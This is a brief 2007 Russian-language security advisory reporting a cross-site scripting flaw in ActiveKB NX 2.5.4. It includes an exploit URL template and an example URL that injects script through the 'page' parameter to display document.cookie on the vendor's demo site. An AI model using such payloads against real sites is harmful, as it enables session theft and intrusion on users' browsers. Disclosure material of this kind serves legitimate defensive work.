XXS в ActiveKB NX 2.5.4

2007-09-11T00:00:00
ID SECURITYVULNS:DOC:17956
Type securityvulns
Reporter Securityvulns
Modified 2007-09-11T00:00:00

Description

Здравствуйте, 3APA3A.

Software: ActiveKB NX 2.5.4 Vendor: www.interspire.com Vulnerability: XXS Risk: низкий Date: 1.09.2007 discovered by durito [damagelab] -durito[at]mail[dot]ru- HTTP: durito.narod.ru

+~~~:| Details |:

Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.

+~~~:| Экплойт |:

http://www.target.com/activekb/ActiveKB/?page=[XXS]

+~~~:| Пример |:

http://www.interspire.com/activekb/demo/default/categories/ActiveKB/?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E

-- С уважением, durito [NGH Group] mailto:durito@mail.ru http://durito.narod.ru http://ngh.void.ru